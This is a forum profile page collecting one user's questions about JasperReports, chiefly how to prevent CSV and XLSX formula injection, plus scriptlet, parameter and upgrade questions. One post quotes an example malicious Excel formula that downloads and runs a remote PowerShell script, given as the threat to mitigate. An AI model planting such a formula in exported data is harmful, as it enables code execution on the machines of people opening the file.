Jump to content
We've recently updated our Privacy Statement, available here ×

asookaziangmail.com

Members
 View Profile  See their activity

  • Posts

    11

  • Joined

  • Last visited

asookaziangmail.com's Achievements

Apprentice

Apprentice (3/14)

  • Week One Done
  • One Month Later
  • One Year In
  • First Post Rare
  • Collaborator Rare

Recent Badges

0

Reputation

  1. asookaziangmail.com
    I don't see any reference to "formula injection" or "CSV injection" in this official JR server guide: https://community.jaspersoft.com/system/files/restricted-docs/jasperreports-server-security-guide_7.pdf
  2. asookaziangmail.com
    Compare to this convenient/easy solution by SAP reports (by default prepends with space to deactivate all formulas in CSV): https://help.sap.com/viewer/2e167338c1b24da9b2a94e68efd79c42/4.2.6/en-US/dbf05bdcd39f4e96a29e2e12a2bca3f5.html
  3. asookaziangmail.com
    With Jasper Reports library 6.17.0 (latest) it seems there is no way to prevent and/or mitigate potential CSV injection attacks. What is the best practice guidance here regarding CSV injection? Is it supported in 6.x or not? If yes, how to implement/configure? In consideration are formula values (e.g. =HYPERLINK(xxx) or =cmd(xxx)) from database query; we want only these types of values as per a regex pattern to be "deactivated" as formulas when the csv is opened in Excel. The CSV exporter config in SimpleCsvExporterConfiguration for setForceFieldEnclosure does not seem to solve this problem, it simply surrounds all CSV values with a specific character (default is double quote).
  4. asookaziangmail.com
    Interested in any answers/guidance as well on this topic of formula injection in CSV and XLSX use cases. Reference: https://pentestmag.com/formula-injection/ Is it possible to set some config/property such that the JRXlsxExporter will auto prepend a space or apostrophe in front of "=cmd***" in any textFields that are saved as such in the db tables queried by the report query? For example, assume Person.FirstName value in db table is the following: =cmd|'/Cpowershell Import-Module BitsTransfer; Start-BitsTransfer -source https://141.io/shell.ps; Invoke-Item shell.ps;'!z which could be a malicious download script attempt in formula field. Would it be possible to prevent such attack specifically in the fillReport() intercept or similar? This is "supposed" to solve the problem with Csv (can you provide an example? original poster says doesn't work): ​http://jasperreports.sourceforge.net/api/net/sf/jasperreports/export/SimpleCsvExporterConfiguration.html#setForceFieldEnclosure-java.lang.Boolean- Unfortunately, the same APIs don't exist for http://jasperreports.sourceforge.net/api/net/sf/jasperreports/export/SimpleXlsxExporterConfiguration.html Why doesn't the same APIs exist for force field enclosure for XLSX?
  5. asookaziangmail.com
    The following solution allows the user to write reports programmatically using Jasper Reports indirectly. I'm assuming the java class can extend a parent class which may have common input parameters defined. And the child class can add additional input parameters. https://mkyong.com/java/reporting-in-java-using-dynamicreports-and-jasperreports/ Is it possible to have a base master jrxml be extended by a child jrxml? I have researched this extensively and seems nobody asks and there is no solution other than for the template for styles: http://jasperreports.sourceforge.net/sample.reference/templates/index.html I am looking for a master jrxml to extend for inheriting custom defined parameters. thanks.
  6. asookaziangmail.com
    I have a use case where I need to enforce detail band scriptlet invocations to occur prior to REPORT_MAX_COUNT filter being applied on query resultset. Is this possible? If yes, how? If you add a scriptlet invocation at summary band, is it guaranteed to occur after the detail band scriptlet invocations? We are using Jasper Reports library version 5.6.1. thanks in advance.
  7. asookaziangmail.com
    We are using Jasper 5.6.1 and Angular 1.x. We would like to implement a multi select drop down control for a particular report. The control would map to one (or more?) input params in the JRXML. Is this supported? in which version? what is best practice for implementing this? We have a custom directive in Angular which successfully implements multi select dropdown in Javascript/HTML via checkboxes and is successfully passing the multiple selected values from the control to the REST service upon form submission to generate the report. The net.sf.jasperreports.engine.JasperFillManager.fill() methods all require Map<String, Object> for parameters param. Our solution is cloning the key (p1 in the example below) for the REST endpoint/URL: http://localhost:8181/web/myReport/generate/pdf?p1=XXX&p1=YYY&p1=ZZZ&pStartDate=2018-11-19+00:00:00&pEndDate=2018-11-20+00:00:00 which results in: http://localhost:8181/web/myReport/generate/pdf?p1=ZZZ&pStartDate=2018-11-19+00:00:00&pEndDate=2018-11-20+00:00:00 because a Map does not allow duplicate keys. Is there any way around this or a better way to solve for multiple select drop downs? Alternate: http://localhost:8181/web/myReport/generate/pdf?p1=XXX,YYY,ZZZ&pStartDate=2018-11-19+00:00:00&pEndDate=2018-11-20+00:00:00 comma delimited list for p1 but not sure this will work either... Also note that p1 is defined as java.lang.String in the JRXML, should it be changed to Map, List, String[] to accommodate?
  8. asookaziangmail.com
    I am trying to set a non-input parameter's value from a Java scriptlet which extends as JRDefaultScriptlet follows: @Override public void beforeReportInit() throws JRScriptletException { Map<String,JRFillParameter> parametersMap = super.parametersMap; JRFillParameter fillParam = parametersMap.get("myParam"); fillParam.setValue("myParamValue"); //reset map super.parametersMap.put("myParam", fillParam); }[/code]The new value for the myParam parameter is either not beign set properly or not taking effect at the proper/expected timing. The value of the param is evaluated/used in a DynamicQueryController similar to this demo: https://www.youtube.com/watch?v=tvddKCeWPBY. Please identify how to resolve this problem. Generally speaking, how would one set a non-input parameter value programmatically? thanks. Jasper Reports 5.6.1.
  9. asookaziangmail.com
    using Jasper Reports 5.6.1 We have a report in two formats: CSV and PDF. We have a new requirement which requires scanning a specified field (input param) for invalid values configured in CSV files. We cannot create/populate RDBMS tables instead of using CSV files due to usage of regex for invalid filter patterns/values. We have the need to apply two dynamic filters for this requirement: 1) remove all rows from detail band which have invalid SSNs, for example 2) if as a result of application of filter 1 above, there is only one row remaining for the grouping for the detail band, then remove that row as well (the report compares values and for comparison we need minimum 2 rows in detail band per grouping) We cannot simply hardcode invalid values in SQL and use NOT IN clause, etc. as the invalid values list in CSV may change in the future. Currently solving by using a scriptlet which is invoked from detail band's printWhenExpression. This invokes a method in the scriptlet for every row in detail bands (thousands or millions of invocations depending on amount of data returned by report's SQL query). If the row needs to be removed/excluded, method returns true, otherwise false. Experimenting with other overridden methods in scriptlet which extends JRDefaultScriptlet like beforeReportInit(). Goal is to see if I can apply the secondary filter (#2 above) in one of these overridden methods. Issue I'm having is I don't know how to remove rows in detail band, remove detail band itself completely, or remove group in the Jasper report programmatically from the scriptlet/class which extends JRDefaultScriptlet. I don't see any examples of how/why/when to use the APIs like beforeReportInit(), etc. Is it possible to achieve this and how? Also concerned about performance degradation as a result. thx. I don't see any examples in this Scriptlet sample blog regarding "It is within these methods you will place your own logic to manipulate data in the report. " Also, the Scriptlet.java file is not available/attached at below link apparently. I have yet to see/find an example which shows dataset manipulation in a scriptlet in Jasper. Reference: http://jasperreports.sourceforge.net/sample.reference/scriptlet/
  10. asookaziangmail.com
    Hi, I'm a JasperReports and iReport n00b. I'm wondering what issues or tips/tricks or advice is known about upgrading from 3.0.0 to 3.7.2 of iReports. We are using these tools to produce PDF files. Specifically, I saw some differences in the foo.jrxml file before and after the upgrade. One difference I’m seeing a lot in the jrxml file is this: isSplitAllowed="true" (new) rather than splitType="Stretch" (old). Is this something to be concerned about? What about needing to upgrade any libraries? Current libs: jasperreports-3.1.2.jar itext-2.1.4.jar
×
×
  • Create New...

© 2024 Cloud Software Group,
Inc. All rights reserved.

Products

Explore